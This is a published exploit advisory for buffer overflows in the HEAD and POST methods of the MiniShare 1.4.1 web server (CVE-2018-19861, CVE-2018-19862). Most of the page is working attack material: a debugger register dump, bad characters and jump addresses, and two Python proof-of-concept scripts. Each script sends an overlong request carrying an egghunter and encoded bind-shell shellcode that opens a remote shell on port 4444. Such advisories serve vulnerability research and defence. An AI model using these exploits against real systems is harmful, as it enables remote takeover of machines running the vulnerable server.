MiniShare 1.4.1 HEAD / POST Buffer Overflow

2018.12.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-119

Hi!!! playing in 2006.... I have adapted the exploit to python Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST methods are also vulnerable. The difference is minimal, both are exploited in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length ------------------------------------------------------------------- EAX 00000000 ECX 77C3EF3B msvcrt.77C3EF3B EDX 00F14E38 EBX 43346843 ESP 01563908 ASCII "6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co HTTP/1.1 " EBP 0156BB90 ESI 00000001 EDI 01565B68 EIP 68433568 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDD000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 ------------------------------------------------------------------------------ Only 210 bytes to shellcode ------------------------------------------------------------------------------ Badchars '00','0d' ------------------------------------------------------------------------------ >findjmp kernel32.dll esp - XP SP 3 English Scanning kernel32.dll for code useable with the esp register 0x7C809F83 call esp 0x7C8369E0 call esp 0x7C83C2C5 push esp - ret 0x7C87641B call esp <!-- # Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method. # Date: 05-12-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://minishare.sourceforge.net/ # Software Link: http://minishare.sourceforge.net/ # Version: Minishare v1.4.1 # Tested on: Windows # CVE : CVE-2018-19861 # Category: exploit 1. Description Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP HEAD request. 2. Proof of Concept Exploit: #!/usr/bin/env python import socket import struct import os # Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP HEAD request - by Rafa # CVE: CVE-2018-19861 # Via Egghunter because shellcode in ESP only 210 bytes long. # Project Home Page (MiniShare) - http://minishare.sourceforge.net/ connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "127.0.0.1" port = 80 # 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -a x86 --platform windows -b "\x00\x0d" -f c #Found 10 compatible encoders #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai #x86/shikata_ga_nai succeeded with size 355 (iteration=0) #x86/shikata_ga_nai chosen with final size 355 #Payload size: 355 bytes #Final size of c file: 1516 bytes #unsigned char buf[] = shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" "\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f" "\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a" "\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f" "\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16" "\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d" "\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97" "\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2" "\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa" "\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43" "\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3" "\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d" "\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77" "\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49" "\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07" "\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0" "\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83" "\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59" "\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda" "\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13" "\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76" "\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5" "\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f" "\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c") # findjmp kernel32.dll esp - WinXP SP3 English #0x7C809F83 call esp nops = "\x90" * 16 junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 - 1786 - 4 - 16 - len(egghunter)) try: print "Sending exploit..." connection.connect((host,port)) buffer = ( "HEAD " + junk + " HTTP/1.1\r\n" "Host: " + shellcode + "\r\n\r\n") connection.send(buffer) connection.close() print "\nExploit Sended ", len(buffer) except: print "Connection error" 3. Solution: This product is deprecated --> <!-- # Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method. # Date: 05-12-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://minishare.sourceforge.net/ # Software Link: http://minishare.sourceforge.net/ # Version: Minishare v1.4.1 # Tested on: Windows # CVE : CVE-2018-19862 # Category: exploit 1. Description Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP POST request. 2. Proof of Concept Exploit: #!/usr/bin/env python import socket import struct import os # Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP POST request - by Rafa # CVE: CVE-2018-19862 # Via Egghunter because shellcode in ESP only 210 bytes long. # Project Home Page (MiniShare) - http://minishare.sourceforge.net/ connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "127.0.0.1" port = 80 # 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -a x86 --platform windows -b "\x00\x0d" -f c #Found 10 compatible encoders #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai #x86/shikata_ga_nai succeeded with size 355 (iteration=0) #x86/shikata_ga_nai chosen with final size 355 #Payload size: 355 bytes #Final size of c file: 1516 bytes #unsigned char buf[] = shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" "\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f" "\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a" "\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f" "\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16" "\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d" "\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97" "\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2" "\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa" "\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43" "\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3" "\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d" "\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77" "\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49" "\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07" "\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0" "\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83" "\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59" "\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda" "\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13" "\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76" "\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5" "\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f" "\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c") # findjmp kernel32.dll esp - WinXP SP3 English #0x7C809F83 call esp nops = "\x90" * 16 junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 - 1786 - 4 - 16 - len(egghunter)) try: print "Sending exploit..." connection.connect((host,port)) buffer = ( "POST " + junk + " HTTP/1.1\r\n" "Host: " + shellcode + "\r\n\r\n") connection.send(buffer) connection.close() print "\nExploit Sended ", len(buffer) except: print "Connection error" 3. Solution: This product is deprecated -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top